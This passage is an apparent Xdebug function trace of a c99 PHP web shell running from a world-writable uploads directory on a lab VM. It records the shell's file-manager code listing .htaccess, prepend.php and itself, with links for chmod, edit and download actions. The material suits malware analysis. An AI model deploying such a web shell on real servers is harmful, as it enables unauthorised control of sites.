4	445	R			'r--'
4	446	0	0.026852	1356552	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => '-', 'Uygulanamadi!' => '-']
4	446	1	0.026868	1356648
4	446	R			'r--'
3	443	1	0.026882	1355432
3	443	R			'-rw-r--r--'
2	439	1	0.026895	1355456
2	439	R			'<font color=white>-rw-r--r--</font>'
1		A						/var/www/html/uploads/c99_php7.4.php	2090	$row[] = '<a href="?act=chmod&f=.htaccess&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=white>-rw-r--r--</font></b></a>'
2	447	0	0.026928	1355552	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	2092	1	'/var/www/html/uploads/.htaccess'
2	447	1	0.026942	1355744
2	447	R			'/var/www/html/uploads/.htaccess'
1		A						/var/www/html/uploads/c99_php7.4.php	2092	$checkbox = '<input type="checkbox" name="actbox[]" id="actbox2" value="/var/www/html/uploads/.htaccess">'
2	448	0	0.026971	1355472	is_dir	0		/var/www/html/uploads/c99_php7.4.php	2093	1	'/var/www/html/uploads/.htaccess'
2	448	1	0.026985	1355512
2	448	R			FALSE
1		A						/var/www/html/uploads/c99_php7.4.php	2094	$row[] = '<a href="?act=f&f=.htaccess&ft=info&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<a href="?act=f&f=.htaccess&ft=edit&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=change" alt="Degistir" height="16" width="19" border="0"></a>&nbsp;<a href="?act=f&f=.htaccess&ft=download&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=download" alt="Indir" height="16" width="19" border="0"></a>&nbsp;<input type="checkbox" name="actbo'
2	449	0	0.027022	1356112	is_link	0		/var/www/html/uploads/c99_php7.4.php	2096	1	'/var/www/html/uploads/.htaccess'
2	449	1	0.027038	1356152
2	449	R			FALSE
2	450	0	0.027051	1356112	is_dir	0		/var/www/html/uploads/c99_php7.4.php	2097	1	'/var/www/html/uploads/.htaccess'
2	450	1	0.027064	1356152
2	450	R			FALSE
2	451	0	0.027076	1356112	is_file	0		/var/www/html/uploads/c99_php7.4.php	2098	1	'/var/www/html/uploads/.htaccess'
2	451	1	0.027090	1356152
2	451	R			TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	2098	$tab['files'][] = [0 => '<img src="?act=img&img=ext_htaccess" border="0">&nbsp;<a href="?act=f&f=.htaccess&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&">.htaccess</a>', 1 => '64 B', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=.htaccess&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=white>-rw-r--r--</font></b></a>', 5 => '<a href="?act=f&f=.htaccess&ft=info&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<a href="?act=f&f=.htaccess&ft=edit&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=change" alt="Degistir" height="16" width="19" border="0"></a>&nbsp;<a href="?act=f&f=.htaccess&ft=download&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=download" alt="Indir" height="16" width="19" border="0"></a>&nbsp;<input type="checkbox" name="actbo']
1		A						/var/www/html/uploads/c99_php7.4.php	2099	$i++
1		A						/var/www/html/uploads/c99_php7.4.php	2024	$v = '/var/www/html/uploads/c99_php7.4.php'
2	452	0	0.027154	1356488	basename	0		/var/www/html/uploads/c99_php7.4.php	2025	1	'/var/www/html/uploads/c99_php7.4.php'
2	452	1	0.027169	1356560
2	452	R			'c99_php7.4.php'
1		A						/var/www/html/uploads/c99_php7.4.php	2025	$o = 'c99_php7.4.php'
2	453	0	0.027193	1356528	dirname	0		/var/www/html/uploads/c99_php7.4.php	2026	1	'/var/www/html/uploads/c99_php7.4.php'
2	453	1	0.027206	1356624
2	453	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2026	$dir = '/var/www/html/uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2028	$disppath = 'c99_php7.4.php'
2	454	0	0.027242	1356496	str2mini	1		/var/www/html/uploads/c99_php7.4.php	2029	2	'c99_php7.4.php'	60
2	454	1	0.027256	1356496
2	454	R			'c99_php7.4.php'
1		A						/var/www/html/uploads/c99_php7.4.php	2029	$disppath = 'c99_php7.4.php'
2	455	0	0.027285	1356496	in_array	0		/var/www/html/uploads/c99_php7.4.php	2030	2	'/var/www/html/uploads/c99_php7.4.php'	[]
2	455	1	0.027298	1356568
2	455	R			FALSE
2	456	0	0.027311	1356496	in_array	0		/var/www/html/uploads/c99_php7.4.php	2031	2	'/var/www/html/uploads/c99_php7.4.php'	[]
2	456	1	0.027324	1356568
2	456	R			FALSE
2	457	0	0.027336	1356496	strstr	0		/var/www/html/uploads/c99_php7.4.php	2034	2	'c99_php7.4.php'	'c99_php7.4.php'
2	457	1	0.027350	1356608
2	457	R			'c99_php7.4.php'
2	458	0	0.027364	1356496	is_numeric	0		/var/www/html/uploads/c99_php7.4.php	2036	1	1
2	458	1	0.027376	1356528
2	458	R			TRUE
2	459	0	0.027393	1356496	round	0		/var/www/html/uploads/c99_php7.4.php	2039	1	1
2	459	1	0.027405	1356528
2	459	R			1
1		A						/var/www/html/uploads/c99_php7.4.php	2039	$r[1] = 1
2	460	0	0.027431	1356872	is_dir	0		/var/www/html/uploads/c99_php7.4.php	2040	1	'/var/www/html/uploads/c99_php7.4.php'
2	460	1	0.027446	1356920
2	460	R			FALSE
1		A						/var/www/html/uploads/c99_php7.4.php	2040	$isdir = FALSE
1		A						/var/www/html/uploads/c99_php7.4.php	2044	$disppath = '<font color="yellow">c99_php7.4.php</font>'
2	461	0	0.027486	1356584	strstr	0		/var/www/html/uploads/c99_php7.4.php	2034	2	'c99_php7.4.php'	'config.php'
2	461	1	0.027500	1356656
2	461	R			FALSE
2	462	0	0.027513	1356584	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2050	1	'c99_php7.4.php'
2	462	1	0.027526	1356656
2	462	R			'c99_php7.4.php'
1		A						/var/www/html/uploads/c99_php7.4.php	2050	$uo = 'c99_php7.4.php'
2	463	0	0.027551	1356584	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2051	1	'/var/www/html/uploads'
2	463	1	0.027564	1356672
2	463	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2051	$ud = '%2Fvar%2Fwww%2Fhtml%2Fuploads'
2	464	0	0.027593	1356584	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2052	1	'/var/www/html/uploads/c99_php7.4.php'
2	464	1	0.027606	1356696
2	464	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fc99_php7.4.php'
1		A						/var/www/html/uploads/c99_php7.4.php	2052	$uv = '%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fc99_php7.4.php'
1		A						/var/www/html/uploads/c99_php7.4.php	2053	$row = []
2	465	0	0.027656	1356584	is_dir	0		/var/www/html/uploads/c99_php7.4.php	2064	1	'/var/www/html/uploads/c99_php7.4.php'
2	465	1	0.027669	1356624
2	465	R			FALSE
2	466	0	0.027682	1356584	is_file	0		/var/www/html/uploads/c99_php7.4.php	2079	1	'/var/www/html/uploads/c99_php7.4.php'
2	466	1	0.027695	1356624
2	466	R			TRUE
2	467	0	0.027707	1356584	explode	0		/var/www/html/uploads/c99_php7.4.php	2081	2	'.'	'c99_php7.4.php'
2	467	1	0.027731	1357104
2	467	R			[0 => 'c99_php7', 1 => '4', 2 => 'php']
1		A						/var/www/html/uploads/c99_php7.4.php	2081	$ext = [0 => 'c99_php7', 1 => '4', 2 => 'php']
1		A						/var/www/html/uploads/c99_php7.4.php	2082	$c = 2
1		A						/var/www/html/uploads/c99_php7.4.php	2083	$ext = 'php'
2	468	0	0.027806	1356576	strtolower	0		/var/www/html/uploads/c99_php7.4.php	2084	1	'php'
2	468	1	0.027830	1356608
2	468	R			'php'
1		A						/var/www/html/uploads/c99_php7.4.php	2084	$ext = 'php'
1		A						/var/www/html/uploads/c99_php7.4.php	2085	$row[] = '<img src="?act=img&img=ext_php" border="0">&nbsp;<a href="?act=f&f=c99_php7.4.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&"><font color="yellow">c99_php7.4.php</font></a>'
2	469	0	0.027874	1357144	view_size	1		/var/www/html/uploads/c99_php7.4.php	2086	1	160253
3	470	0	0.027887	1357144	is_numeric	0		/var/www/html/uploads/c99_php7.4.php	304	1	160253
3	470	1	0.027900	1357176
3	470	R			TRUE
3	471	0	0.027914	1357144	round	0		/var/www/html/uploads/c99_php7.4.php	309	1	15649.70703125
3	471	1	0.027927	1357176
3	471	R			15650
2		A						/var/www/html/uploads/c99_php7.4.php	309	$size = '156.5 KB'
2	469	1	0.027953	1357184
2	469	R			'156.5 KB'
1		A						/var/www/html/uploads/c99_php7.4.php	2086	$row[] = '156.5 KB'
2	472	0	0.027977	1357184	date	0		/var/www/html/uploads/c99_php7.4.php	2088	2	'd.m.Y H:i:s'	1676260944
2	472	1	0.028009	1357512
2	472	R			'12.02.2023 23:02:24'
1		A						/var/www/html/uploads/c99_php7.4.php	2088	$row[] = '12.02.2023 23:02:24'
1		A						/var/www/html/uploads/c99_php7.4.php	2089	$row[] = 'osboxes/osboxes'
2	473	0	0.028046	1357552	view_perms_color	1		/var/www/html/uploads/c99_php7.4.php	2090	1	'/var/www/html/uploads/c99_php7.4.php'
3	474	0	0.028064	1357552	is_readable	0		/var/www/html/uploads/c99_php7.4.php	512	1	'/var/www/html/uploads/c99_php7.4.php'
3	474	1	0.028094	1357592
3	474	R			TRUE
3	475	0	0.028115	1357552	is_writable	0		/var/www/html/uploads/c99_php7.4.php	513	1	'/var/www/html/uploads/c99_php7.4.php'
3	475	1	0.028138	1357592
3	475	R			FALSE
3	476	0	0.029673	1357552	fileperms	0		/var/www/html/uploads/c99_php7.4.php	513	1	'/var/www/html/uploads/c99_php7.4.php'
3	476	1	0.029695	1357592
3	476	R			33204
3	477	0	0.029710	1357552	view_perms	1		/var/www/html/uploads/c99_php7.4.php	513	1	33204
3		A						/var/www/html/uploads/c99_php7.4.php	454	$type = '-'
3		A						/var/www/html/uploads/c99_php7.4.php	460	$owner['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	461	$owner['write'] = 'w'
3		A						/var/www/html/uploads/c99_php7.4.php	462	$owner['Uygulanamadi!'] = '-'
3		A						/var/www/html/uploads/c99_php7.4.php	463	$group['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	464	$group['write'] = 'w'
3		A						/var/www/html/uploads/c99_php7.4.php	465	$group['Uygulanamadi!'] = '-'
3		A						/var/www/html/uploads/c99_php7.4.php	466	$world['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	467	$world['write'] = '-'
3		A						/var/www/html/uploads/c99_php7.4.php	468	$world['Uygulanamadi!'] = '-'
4	478	0	0.029843	1358680	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => 'w', 'Uygulanamadi!' => '-']
4	478	1	0.029863	1358776
4	478	R			'rw-'
4	479	0	0.029879	1358712	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => 'w', 'Uygulanamadi!' => '-']
4	479	1	0.029896	1358808
4	479	R			'rw-'
4	480	0	0.029910	1358712	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => '-', 'Uygulanamadi!' => '-']
4	480	1	0.029927	1358808
4	480	R			'r--'
3	477	1	0.029941	1357592
3	477	R			'-rw-rw-r--'
2	473	1	0.029956	1357616
2	473	R			'<font color=white>-rw-rw-r--</font>'
1		A						/var/www/html/uploads/c99_php7.4.php	2090	$row[] = '<a href="?act=chmod&f=c99_php7.4.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=white>-rw-rw-r--</font></b></a>'
2	481	0	0.029994	1357696	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	2092	1	'/var/www/html/uploads/c99_php7.4.php'
2	481	1	0.030011	1357888
2	481	R			'/var/www/html/uploads/c99_php7.4.php'
1		A						/var/www/html/uploads/c99_php7.4.php	2092	$checkbox = '<input type="checkbox" name="actbox[]" id="actbox3" value="/var/www/html/uploads/c99_php7.4.php">'
2	482	0	0.030042	1357600	is_dir	0		/var/www/html/uploads/c99_php7.4.php	2093	1	'/var/www/html/uploads/c99_php7.4.php'
2	482	1	0.030057	1357640
2	482	R			FALSE
1		A						/var/www/html/uploads/c99_php7.4.php	2094	$row[] = '<a href="?act=f&f=c99_php7.4.php&ft=info&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<a href="?act=f&f=c99_php7.4.php&ft=edit&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=change" alt="Degistir" height="16" width="19" border="0"></a>&nbsp;<a href="?act=f&f=c99_php7.4.php&ft=download&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=download" alt="Indir" height="16" width="19" border="0"></a>&nbsp;<input type="checkb'
2	483	0	0.030096	1358240	is_link	0		/var/www/html/uploads/c99_php7.4.php	2096	1	'/var/www/html/uploads/c99_php7.4.php'
2	483	1	0.030120	1358288
2	483	R			FALSE
2	484	0	0.030134	1358248	is_dir	0		/var/www/html/uploads/c99_php7.4.php	2097	1	'/var/www/html/uploads/c99_php7.4.php'
2	484	1	0.030147	1358288
2	484	R			FALSE
2	485	0	0.030160	1358248	is_file	0		/var/www/html/uploads/c99_php7.4.php	2098	1	'/var/www/html/uploads/c99_php7.4.php'
2	485	1	0.030173	1358288
2	485	R			TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	2098	$tab['files'][] = [0 => '<img src="?act=img&img=ext_php" border="0">&nbsp;<a href="?act=f&f=c99_php7.4.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&"><font color="yellow">c99_php7.4.php</font></a>', 1 => '156.5 KB', 2 => '12.02.2023 23:02:24', 3 => 'osboxes/osboxes', 4 => '<a href="?act=chmod&f=c99_php7.4.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=white>-rw-rw-r--</font></b></a>', 5 => '<a href="?act=f&f=c99_php7.4.php&ft=info&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<a href="?act=f&f=c99_php7.4.php&ft=edit&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=change" alt="Degistir" height="16" width="19" border="0"></a>&nbsp;<a href="?act=f&f=c99_php7.4.php&ft=download&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=download" alt="Indir" height="16" width="19" border="0"></a>&nbsp;<input type="checkb']
1		A						/var/www/html/uploads/c99_php7.4.php	2099	$i++
1		A						/var/www/html/uploads/c99_php7.4.php	2024	$v = '/var/www/html/uploads/prepend.php'
2	486	0	0.030245	1358248	basename	0		/var/www/html/uploads/c99_php7.4.php	2025	1	'/var/www/html/uploads/prepend.php'
2	486	1	0.030263	1358320
2	486	R			'prepend.php'
1		A						/var/www/html/uploads/c99_php7.4.php	2025	$o = 'prepend.php'
2	487	0	0.030289	1358248	dirname	0		/var/www/html/uploads/c99_php7.4.php	2026	1	'/var/www/html/uploads/prepend.php'
2	487	1	0.030302	1358344
2	487	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2026	$dir = '/var/www/html/uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2028	$disppath = 'prepend.php'
2	488	0	0.030357	1358168	str2mini	1		/var/www/html/uploads/c99_php7.4.php	2029	2	'prepend.php'	60
2	488	1	0.030373	1358168
2	488	R			'prepend.php'
1		A						/var/www/html/uploads/c99_php7.4.php	2029	$disppath = 'prepend.php'
2	489	0	0.030399	1358168	in_array	0		/var/www/html/uploads/c99_php7.4.php	2030	2	'/var/www/html/uploads/prepend.php'	[]
2	489	1	0.030414	1358240
2	489	R			FALSE
2	490	0	0.030428	1358168	in_array	0		/var/www/html/uploads/c99_php7.4.php	2031	2	'/var/www/html/uploads/prepend.php'	[]
2	490	1	0.030441	1358240
2	490	R			FALSE
2	491	0	0.030455	1358168	strstr	0		/var/www/html/uploads/c99_php7.4.php	2034	2	'prepend.php'	'c99_php7.4.php'
2	491	1	0.030469	1358240
2	491	R			FALSE
2	492	0	0.030482	1358168	strstr	0		/var/www/html/uploads/c99_php7.4.php	2034	2	'prepend.php'	'config.php'
2	492	1	0.030496	1358240
2	492	R			FALSE
2	493	0	0.030509	1358168	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2050	1	'prepend.php'
2	493	1	0.030523	1358240
2	493	R			'prepend.php'
1		A						/var/www/html/uploads/c99_php7.4.php	2050	$uo = 'prepend.php'
2	494	0	0.030549	1358168	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2051	1	'/var/www/html/uploads'
2	494	1	0.030563	1358256
2	494	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads'
1		A						/var/www/html/uploads/c99_php7.4.php	2051	$ud = '%2Fvar%2Fwww%2Fhtml%2Fuploads'
2	495	0	0.030590	1358168	urlencode	0		/var/www/html/uploads/c99_php7.4.php	2052	1	'/var/www/html/uploads/prepend.php'
2	495	1	0.030603	1358280
2	495	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fprepend.php'
1		A						/var/www/html/uploads/c99_php7.4.php	2052	$uv = '%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fprepend.php'
1		A						/var/www/html/uploads/c99_php7.4.php	2053	$row = []
2	496	0	0.030643	1358168	is_dir	0		/var/www/html/uploads/c99_php7.4.php	2064	1	'/var/www/html/uploads/prepend.php'
2	496	1	0.030665	1358208
2	496	R			FALSE
2	497	0	0.030682	1358168	is_file	0		/var/www/html/uploads/c99_php7.4.php	2079	1	'/var/www/html/uploads/prepend.php'
2	497	1	0.030700	1358208
2	497	R			TRUE
2	498	0	0.030718	1358168	explode	0		/var/www/html/uploads/c99_php7.4.php	2081	2	'.'	'prepend.php'
2	498	1	0.030736	1358680
2	498	R			[0 => 'prepend', 1 => 'php']
1		A						/var/www/html/uploads/c99_php7.4.php	2081	$ext = [0 => 'prepend', 1 => 'php']
1		A						/var/www/html/uploads/c99_php7.4.php	2082	$c = 1
1		A						/var/www/html/uploads/c99_php7.4.php	2083	$ext = 'php'
2	499	0	0.030805	1358168	strtolower	0		/var/www/html/uploads/c99_php7.4.php	2084	1	'php'
2	499	1	0.030822	1358200
2	499	R			'php'
1		A						/var/www/html/uploads/c99_php7.4.php	2084	$ext = 'php'
1		A						/var/www/html/uploads/c99_php7.4.php	2085	$row[] = '<img src="?act=img&img=ext_php" border="0">&nbsp;<a href="?act=f&f=prepend.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&">prepend.php</a>'
2	500	0	0.030880	1358704	view_size	1		/var/www/html/uploads/c99_php7.4.php	2086	1	57
3	501	0	0.030898	1358704	is_numeric	0		/var/www/html/uploads/c99_php7.4.php	304	1	57
3	501	1	0.030915	1358736
3	501	R			TRUE
2		A						/var/www/html/uploads/c99_php7.4.php	310	$size = '57 B'
2	500	1	0.030949	1358736
2	500	R			'57 B'
1		A						/var/www/html/uploads/c99_php7.4.php	2086	$row[] = '57 B'
2	502	0	0.030983	1358736	date	0		/var/www/html/uploads/c99_php7.4.php	2088	2	'd.m.Y H:i:s'	1676260944
2	502	1	0.031032	1359064
2	502	R			'12.02.2023 23:02:24'
1		A						/var/www/html/uploads/c99_php7.4.php	2088	$row[] = '12.02.2023 23:02:24'
1		A						/var/www/html/uploads/c99_php7.4.php	2089	$row[] = 'root/root'
2	503	0	0.031084	1359088	view_perms_color	1		/var/www/html/uploads/c99_php7.4.php	2090	1	'/var/www/html/uploads/prepend.php'
3	504	0	0.031103	1359088	is_readable	0		/var/www/html/uploads/c99_php7.4.php	512	1	'/var/www/html/uploads/prepend.php'
3	504	1	0.031132	1359128
3	504	R			TRUE
3	505	0	0.031150	1359088	is_writable	0		/var/www/html/uploads/c99_php7.4.php	513	1	'/var/www/html/uploads/prepend.php'
3	505	1	0.031171	1359128
3	505	R			FALSE
3	506	0	0.031190	1359088	fileperms	0		/var/www/html/uploads/c99_php7.4.php	513	1	'/var/www/html/uploads/prepend.php'
3	506	1	0.031208	1359128
3	506	R			33261
3	507	0	0.031226	1359088	view_perms	1		/var/www/html/uploads/c99_php7.4.php	513	1	33261
3		A						/var/www/html/uploads/c99_php7.4.php	454	$type = '-'
3		A						/var/www/html/uploads/c99_php7.4.php	460	$owner['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	461	$owner['write'] = 'w'
3		A						/var/www/html/uploads/c99_php7.4.php	462	$owner['Uygulanamadi!'] = 'x'
3		A						/var/www/html/uploads/c99_php7.4.php	463	$group['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	464	$group['write'] = '-'
3		A						/var/www/html/uploads/c99_php7.4.php	465	$group['Uygulanamadi!'] = 'x'
3		A						/var/www/html/uploads/c99_php7.4.php	466	$world['read'] = 'r'
3		A						/var/www/html/uploads/c99_php7.4.php	467	$world['write'] = '-'
3		A						/var/www/html/uploads/c99_php7.4.php	468	$world['Uygulanamadi!'] = 'x'
4	508	0	0.031406	1360216	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => 'w', 'Uygulanamadi!' => 'x']
4	508	1	0.031430	1360312
4	508	R			'rwx'
4	509	0	0.031449	1360248	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => '-', 'Uygulanamadi!' => 'x']
4	509	1	0.031472	1360344
4	509	R			'r-x'
4	510	0	0.031490	1360248	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => '-', 'Uygulanamadi!' => 'x']
4	510	1	0.031513	1360344
4	510	R			'r-x'
3	507	1	0.031532	1359128
3	507	R			'-rwxr-xr-x'
2	503	1	0.031551	1359152
2	503	R			'<font color=white>-rwxr-xr-x</font>'
1		A						/var/www/html/uploads/c99_php7.4.php	2090	$row[] = '<a href="?act=chmod&f=prepend.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=white>-rwxr-xr-x</font></b></a>'
2	511	0	0.031597	1359248	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	2092	1	'/var/www/html/uploads/prepend.php'
2	511	1	0.031618	1359440
2	511	R			'/var/www/html/uploads/prepend.php'
1		A						/var/www/html/uploads/c99_php7.4.php	2092	$checkbox = '<input type="checkbox" name="actbox[]" id="actbox4" value="/var/www/html/uploads/prepend.php">'
2	512	0	0.031659	1359152	is_dir	0		/var/www/html/uploads/c99_php7.4.php	2093	1	'/var/www/html/uploads/prepend.php'
2	512	1	0.031677	1359192
2	512	R			FALSE
1		A						/var/www/html/uploads/c99_php7.4.php	2094	$row[] = '<a href="?act=f&f=prepend.php&ft=info&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<a href="?act=f&f=prepend.php&ft=edit&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=change" alt="Degistir" height="16" width="19" border="0"></a>&nbsp;<a href="?act=f&f=prepend.php&ft=download&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=download" alt="Indir" height="16" width="19" border="0"></a>&nbsp;<input type="checkbox" name='
2	513	0	0.031727	1359792	is_link	0		/var/www/html/uploads/c99_php7.4.php	2096	1	'/var/www/html/uploads/prepend.php'
2	513	1	0.031750	1359832
2	513	R			FALSE
2	514	0	0.031768	1359792	is_dir	0		/var/www/html/uploads/c99_php7.4.php	2097	1	'/var/www/html/uploads/prepend.php'
2	514	1	0.031792	1359832
2	514	R			FALSE
2	515	0	0.031810	1359792	is_file	0		/var/www/html/uploads/c99_php7.4.php	2098	1	'/var/www/html/uploads/prepend.php'
2	515	1	0.031855	1359832
2	515	R			TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	2098	$tab['files'][] = [0 => '<img src="?act=img&img=ext_php" border="0">&nbsp;<a href="?act=f&f=prepend.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&">prepend.php</a>', 1 => '57 B', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=prepend.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=white>-rwxr-xr-x</font></b></a>', 5 => '<a href="?act=f&f=prepend.php&ft=info&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<a href="?act=f&f=prepend.php&ft=edit&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=change" alt="Degistir" height="16" width="19" border="0"></a>&nbsp;<a href="?act=f&f=prepend.php&ft=download&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=download" alt="Indir" height="16" width="19" border="0"></a>&nbsp;<input type="checkbox" name=']
1		A						/var/www/html/uploads/c99_php7.4.php	2099	$i++
2	516	0	0.031931	1359792	array_merge	0		/var/www/html/uploads/c99_php7.4.php	2103	5	[0 => [0 => '<b>Name</b><a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=0d"><img src="?act=img&img=sort_asc" height="9" width="14" alt="Asc." border="0"></a>', 1 => '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=1a"><b>Dimension</b></a>', 2 => '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=2a"><b>Changing</b></a>', 3 => '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=3a"><b>Owner/Grup</b></a>', 4 => '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=4a"><b>Permissions(Authority)</b></a>', 5 => '<b>attribute</b>']]	[0 => [0 => '<img src="?act=img&img=ext_lnk" height="16" width="19" border="0">&nbsp;<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml&sort=0a">..</a>', 1 => 'LINK', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=..&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=green>drwxrwxrwx</font></b></a>', 5 => '<a href="?act=d&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F.."><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox0" value="/var/www/html/uploads/..">'], 1 => [0 => '<img src="?act=img&img=small_dir" height="16" width="19" border="0">&nbsp;<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&sort=0a">.</a>', 1 => 'LINK', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=.&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=green>drwxrwxrwx</font></b></a>', 5 => '<a href="?act=d&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F."><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<input type="checkbox" name="actbox[]" onclick="ls_reverse_all();">']]	[0 => [0 => '<img src="?act=img&img=small_dir" height="16" width="19" border="0">&nbsp;<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fdata&sort=0a">[data]</a>', 1 => 'DIR', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=data&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=green>drwxrwxrwx</font></b></a>', 5 => '<a href="?act=d&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fdata"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox1" value="/var/www/html/uploads/data">']]	[]	[0 => [0 => '<img src="?act=img&img=ext_htaccess" border="0">&nbsp;<a href="?act=f&f=.htaccess&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&">.htaccess</a>', 1 => '64 B', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=.htaccess&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=white>-rw-r--r--</font></b></a>', 5 => '<a href="?act=f&f=.htaccess&ft=info&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<a href="?act=f&f=.htaccess&ft=edit&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=change" alt="Degistir" height="16" width="19" border="0"></a>&nbsp;<a href="?act=f&f=.htaccess&ft=download&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=download" alt="Indir" height="16" width="19" border="0"></a>&nbsp;<input type="checkbox" name="actbo'], 1 => [0 => '<img src="?act=img&img=ext_php" border="0">&nbsp;<a href="?act=f&f=c99_php7.4.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&"><font color="yellow">c99_php7.4.php</font></a>', 1 => '156.5 KB', 2 